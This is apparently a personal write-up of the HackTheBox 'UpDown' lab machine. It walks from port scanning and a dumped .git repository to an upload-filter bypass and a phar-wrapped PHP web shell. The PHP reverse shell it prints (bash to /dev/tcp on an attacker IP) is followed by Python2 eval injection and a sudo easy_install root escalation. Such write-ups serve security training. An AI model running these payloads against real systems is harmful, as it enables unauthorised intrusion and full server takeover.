#hackthebox #medium #linux #tjnull ![[Pasted image 20250806165015.png]] # Information Gathering - Nmap I scanned all TCP ports and discovered 2 open ports: 22 and 80 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:39 UTC Nmap scan report for 10.10.11.177 Host is up (0.061s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 17.47 seconds ``` I performed one more TCP scan but only against port 22 and 80. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:43 UTC Nmap scan report for 10.10.11.177 Host is up (0.049s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA) | 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA) |_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Is my Website up ? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds ``` Lastly, I scanned top 10 UDP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:44 UTC Nmap scan report for 10.10.11.177 Host is up (0.048s latency). PORT STATE SERVICE 53/udp open|filtered domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp open|filtered microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds ``` --- # Enumeration ##### HTTP - TCP 80 It's a page that tells you if a website is up and running or down. ![[Pasted image 20250806124741.png]] Mapped `siteisup.htb` to the IP address in `/etc/hosts` file. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo "http://10.10.11.177 siteisup.htb" | sudo tee -a /etc/hosts [sudo] password for kali: http://10.10.11.177 siteisup.htb ``` ![[Pasted image 20250806125724.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.177 - - [06/Aug/2025 17:56:28] "GET / HTTP/1.1" 200 - 10.10.11.177 - - [06/Aug/2025 17:57:30] "GET / HTTP/1.1" 200 - ``` ![[Pasted image 20250806125737.png]] I turned `Deubg mode` on and checked again. It shows the HTTP header of the request and lists every file available in that directory. ![[Pasted image 20250806130326.png]] Burp shows the same thing. ![[Pasted image 20250806130035.png]] `ffuf` discovers 1 valid subdomain: `dev.siteisup.htb`. I'll also add that to `/etc/hosts` file. ![[Pasted image 20250806132151.png]] However `dev.siteisup.htb` returns `Forbidden 403` ![[Pasted image 20250806143514.png]] I manually found `.git` under `/dev` because my go-to wordlists do not contain `.git` in their search ![[Pasted image 20250806133907.png]] `git-dumper` downloads all the source code to `git_loot` directory. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ git-dumper http://siteisup.htb/dev/.git git_loot [-] Testing http://siteisup.htb/dev/.git/HEAD [200] [-] Testing http://siteisup.htb/dev/.git/ [200] [-] Fetching .git recursively ... <SNIP> ``` ```bash commit 010dcc30cc1e89344e2bdbd3064f61c772d89a34 (HEAD -> main, origin/main, origin/HEAD) Author: Abdou.Y <[email protected]> Date: Wed Oct 20 19:38:51 2021 +0200 Delete index.php commit c8fcc4032487eaf637d41486eb150b7182ecd1f1 Author: Abdou.Y <[email protected]> Date: Wed Oct 20 19:38:08 2021 +0200 Update checker.php commit f67efd00c10784ae75bd251add3d52af50d7addd Author: Abdou.Y <[email protected]> Date: Wed Oct 20 18:33:11 2021 +0200 Create checker.php commit ab9bc164b4103de3c12ac97152e6d63040d5c4c6 Author: Abdou.Y <[email protected]> Date: Wed Oct 20 18:30:58 2021 +0200 Update changelog.txt commit 60d2b3280d5356fe0698561e8ef8991825fec6cb Author: Abdou.Y <[email protected]> Date: Wed Oct 20 18:30:39 2021 +0200 Create admin.php commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7 Author: Abdou.Y <[email protected]> Date: Wed Oct 20 18:29:45 2021 +0200 Add admin panel. commit 35a380176ff228067def9c2ecc52ccfe705de640 Author: Abdou.Y <[email protected]> Date: Wed Oct 20 17:40:49 2021 +0200 Create changelog.txt commit 4fb192727c29c158a659911aadcdcc23e4decec5 Author: Abdou.Y <[email protected]> Date: Wed Oct 20 15:28:26 2021 +0200 Create stylesheet.css commit 6f89af70fd23819664dd28d764f13efc02ecfd88 Author: Abdou.Y <[email protected]> Date: Wed Oct 20 15:05:40 2021 +0200 Create index.php commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f Author: Abdou.Y <[email protected]> Date: Wed Oct 20 15:05:08 2021 +0200 Create .htpasswd commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372 Author: Abdou.Y <[email protected]> Date: Wed Oct 20 15:04:38 2021 +0200 Create .htaccess ``` Found this inside `.htaccess` file. I think it's telling me to add `Special-Dev: only4dev` in the request header. ```bash ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ cat .htaccess SetEnvIfNoCase Special-Dev "only4dev" Required-Header Order Deny,Allow Deny from All Allow from env=Required-Header ``` As I added `Special-Dev` header in the request, the server returned 200 OK. ![[Pasted image 20250806143716.png]] In the Burp settings, I have added `Specia-Dev: only4dev` so every time I make a request through Burp, it will automatically add that in to the header. ![[Pasted image 20250806144606.png]] After applying the new settings, I navigated to `dev.siteisup.htb` and it didn't return `Forbidden` but a new web page with a file upload feature. Also, on the top left, it says `This is only for developers` and it's currently in `beta` version. ![[Pasted image 20250806144812.png]] I tried uploaidng `php-reverse-shell.php` file but it returned `Extension not allowed!` ![[Pasted image 20250806145251.png]] I revisited the source code we dumped using `git-dumper` and `checker.php` is the file that checks upload feature conditions. We can see that it's blocking any file extensions that contain the word `php`. ![[Pasted image 20250806145718.png]] It didn't error this time saying "Extension not allowed". ![[Pasted image 20250806150124.png]] However, when I navigated into the newly created folder in `/uploads`, nothing was there. ![[Pasted image 20250806151623.png]]![[Pasted image 20250806151631.png]] I suspect that's because of this code, which deletes all the uploaded files after checking. ![[Pasted image 20250806151721.png]] I renamed my payload back to `shell.php`, compressed it as a zip file and named it `shell.zip` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ mv shell.phar shell.php ┌──(kali㉿kali)-[~/Desktop] └─$ zip shell.jpeg shell.php adding: shell.php (deflated 59%) ``` As you can see the `.jpeg` file is not deleted. ![[Pasted image 20250806151947.png]] However it fails to execute the webshell. ![[Pasted image 20250806152034.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ vim shell.php ┌──(kali㉿kali)-[~/Desktop] └─$ cat shell.php <?php system($_GET["cmd"]); ?> ┌──(kali㉿kali)-[~/Desktop] └─$ zip shell.jpeg shell.php adding: shell.php (stored 0%) ``` I used a `php wrapper` technique to include my payload but it still failed. I'll attempt to look up `phpinfo` and see how the server is configured. ![[Pasted image 20250806152900.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat shell.php <?php phpinfo() ?> ┌──(kali㉿kali)-[~/Desktop] └─$ zip shell.jpeg shell.php adding: shell.php (stored 0%) ``` `http://dev.siteisup.htb/?page=phar://uploads/889285754fc9d306daaa0e2e2f218169/shell.jpeg/shell` finally returned `phpinfo()` page. ![[Pasted image 20250806153413.png]] It reveals that a lot of functions are disabled including `system` and `exec` ![[Pasted image 20250806153641.png]] I am going to use `dfunc-bypasser.py` to discover what alternatives I can use to get command execution. It kept failing, then I remembered that I have to add `Special-dev` hearder. ![[Pasted image 20250806154956.png]] `dfunc-bypasser` verifies we can use `proc_open` function. ![[Pasted image 20250806155235.png]] Created a reverse shell using `proc_open` function. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat shell.php <?php $cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'"; $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($cmd, $descriptorspec, $pipes); ?> ┌──(kali㉿kali)-[~/Desktop] └─$ zip shell.jpeg shell.php adding: shell.php (deflated 37%) ``` Finally got a shell as `www-data` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.11.177] 43444 bash: cannot set terminal process group (922): Inappropriate ioctl for device bash: no job control in this shell www-data@updown:/var/www/dev$ whoami whoami www-data www-data@updown:/var/www/dev$ ``` # Privilege Escalation - shell as `developer` Found `user.txt` in `/home/developer` but cannot access it with the current user privileges. ```bash www-data@updown:/home/developer$ ls -l total 8 drwxr-x--- 2 developer www-data 4096 Jun 22 2022 dev -rw-r----- 1 root developer 33 Aug 6 17:36 user.txt ``` Inside `/home/developer/dev`, `siteisup` file has a SUID bit set. It appears to run `siteisup_test.py` file. ![[Pasted image 20250806163225.png]] `siteisup_test.py` seems to be written in `Python2` which has a major vulnerability with `input()`, which takes input from the user and pass it to `eval()` meaning if we pass some command as input, it will run it. ```bash www-data@updown:/home/developer/dev$ cat siteisup_test.py import requests url = input("Enter URL here:") page = requests.get(url) if page.status_code == 200: print "Website is up" else: print "Website is down"www-data@updown:/home/developer/dev ``` Successfully got a shell as `developer` ```bash www-data@updown:/home/developer/dev$ ls siteisup siteisup_test.py www-data@updown:/home/developer/dev$ ./siteisup Welcome to 'siteisup.htb' application Enter URL here:__import__('os').system('bash') developer@updown:/home/developer/dev$ whoami developer ``` # Privilege Escalation - shell as `root` Even though I got a shell as `developer` I still could not access `user.txt` file ```bash developer@updown:/home/developer$ id uid=1002(developer) gid=33(www-data) groups=33(www-data) developer@updown:/home/developer$ cat user.txt cat: user.txt: Permission denied ``` I copied the private key in `/home/developer/.ssh` and logged into SSH server with the key. ```bash developer@updown:/home/developer/.ssh$ ls authorized_keys id_rsa id_rsa.pub ``` Got `user.txt` ```bash developer@updown:~$ id uid=1002(developer) gid=1002(developer) groups=1002(developer) developer@updown:~$ cat user.txt 610... ``` User developer can run `/usr/local/bin/easy_install` command as `sudo` and no password required. ```bash developer@updown:/home/developer/dev$ sudo -l Matching Defaults entries for developer on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User developer may run the following commands on localhost: (ALL) NOPASSWD: /usr/local/bin/easy_install ``` I referred to `GTFObins` for `easy_install`exploit ```bash developer@updown:~$ TF=$(mktemp -d) developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py developer@updown:~$ sudo easy_install $TF WARNING: The easy_install command is deprecated and will be removed in a future version. Processing tmp.PgqnvDp3QD Writing /tmp/tmp.PgqnvDp3QD/setup.cfg Running setup.py -q bdist_egg --dist-dir /tmp/tmp.PgqnvDp3QD/egg-dist-tmp-KvASUn # whoami root ``` Found `root.txt` ```bash # cd /root # cat root.txt e643... ```